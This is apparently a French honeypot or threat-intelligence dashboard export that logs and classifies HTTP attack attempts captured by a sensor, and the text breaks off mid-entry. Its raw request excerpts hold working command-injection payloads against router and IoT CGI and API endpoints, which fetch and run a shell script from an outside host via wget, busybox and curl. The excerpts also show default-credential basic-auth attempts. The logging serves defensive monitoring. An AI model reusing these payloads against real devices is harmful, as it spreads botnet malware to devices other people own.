POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-url
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 350 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&act |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-url
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 334 Connection: close change_action=&submit_button=Basic&action=&commit=0&wan_ip=10.0.0.1&wan_mask= |
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20w… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhablk%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhab…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /hndUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h
Requête brute (extrait)
GET /hndUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lhablk%60 HTTP/1.1 Host: 6 |
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wg… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20l…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /tmUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20htt
Requête brute (extrait)
GET /tmUnblock.cgi?ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lublk%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lublk%60 HTTP/1.1 Host: 62.3. |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /tmUnblock.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /tmUnblock.cgi
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/tmUnblock.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/tmUnblock.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 242 Conne
Requête brute (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 242 Connection: close ttcp_num=3&ttcp_size=3&ttcp_ip=-h+%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lunblkv%3B |
|||||||
| TCP | 8081 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:8081 · (sonde / probe) | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /
Émulateur
HTTP
WAF
3
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Sonde HTTP (tag sap-sapcontrol-path) · confiance 80%
Confiance classification
80%
Risque capteur
Moyen
· 40
Confiance : Confiance 80 % — Score WAF 20 · 1 tag(s) WAF
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /tmUnblock.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /tmUnblock.cgi
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/tmUnblock.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/tmUnblock.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 294 Conne
Requête brute (extrait)
POST /tmUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 294 Connection: close submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60cd%20/tmp%3Bwget%20http://91 |
|||||||
| TCP | 8081 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:8081 · (tentative d'exploit) · → /hndUnblock.cgi | Élevée | Élevé · 80 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /hndUnblock.cgi
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/hndUnblock.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/hndUnblock.cgi
Service
HTTP
Pourquoi cette classification : Motif SSRF · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 80
Confiance : Confiance 95 % — Motif catalogue confirmé · 6 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /hndUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 299 Conn
Requête brute (extrait)
POST /hndUnblock.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 299 Connection: close ttcp_ip=-h%20%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lunblk%3Bbusybox%20wget%20http |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/ping.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/ping.cgi
Émulateur
HTTP
WAF
53
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/ping.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/cgi-bin/ping.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
SSRF Localhost SSRF
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-2
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/ping.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 177 Co
Requête brute (extrait)
POST /cgi-bin/ping.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 177 Connection: close host=127.0.0.1`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s planet;busybox wget http://91.92.40.118/wge |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /login.php | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /login.php
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/login.php
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /login.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 187 Connectio
Requête brute (extrait)
POST /login.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 187 Connection: close password=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s sound4;busybox wget http://91.92.40.118/wget.sh -O-|sh |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /DroboPix/api/drobopix/demo | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /DroboPix/api/drobopix/demo
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/DroboPix/api/drobopix/demo
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/DroboPix/api/drobopix/demo
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /DroboPix/api/drobopix/demo HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json Content-Length: 174 Connectio
Requête brute (extrait)
POST /DroboPix/api/drobopix/demo HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json Content-Length: 174 Connection: close {"payload":"`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s drobo;busybox wget http://91.92.40.118/wget.sh -O-|s
|
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wge… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20ra…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20raid%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20raid%60
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /timeHandler.cgi?time=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http://91.
Requête brute (extrait)
GET /timeHandler.cgi?time=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20raid%60 HTTP/1.1 Host: 62.3.50.33:808 |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/PingTest.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/PingTest.cgi
Émulateur
HTTP
WAF
53
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/PingTest.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/cgi-bin/PingTest.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
SSRF Localhost SSRF
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-2
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/PingTest.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 173
Requête brute (extrait)
POST /cgi-bin/PingTest.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 173 Connection: close ping_test=127.0.0.1`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s dpt;busybox wget http://91.92.40.1 |
|||||||
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20zyxn%3Bbusybox%20wge… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20zyxn%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20zy…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20zyxn%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20zyxn%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20zyxn%60&password=x
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20zyxn%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20zyxn%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20zyxn%60&…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /cgi-bin/weblogin.cgi?username=admin%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20zyxn%3Bbusybox%20wge
Requête brute (extrait)
GET /cgi-bin/weblogin.cgi?username=admin%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20zyxn%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20zyxn%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20zyxn%60&password=x HTTP/ |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/weblogin.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/weblogin.cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/weblogin.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/cgi-bin/weblogin.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/weblogin.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 188
Requête brute (extrait)
POST /cgi-bin/weblogin.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 188 Connection: close username=admin`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s zyx326;busybox wget http://91.92.40.118 |
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8081 Cookie: PHPSESSID=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20asu
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8081 Cookie: PHPSESSID=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20asusn%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20asusn%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20asusn |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /api/tunnel/tailscale-install | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /api/tunnel/tailscale-install
Émulateur
HTTP
WAF
51
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/tunnel/tailscale-install
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/api/tunnel/tailscale-install
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
k8s-api
Payload (extrait)
POST /api/tunnel/tailscale-install HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json Content-Length: 176 Connect
Requête brute (extrait)
POST /api/tunnel/tailscale-install HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json Content-Length: 176 Connection: close {"cmd":"`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s 9router;busybox wget http://91.92.40.118/wget.sh -O-|s
|
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /api/network/settings | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /api/network/settings
Émulateur
HTTP
WAF
51
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api/network/settings
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
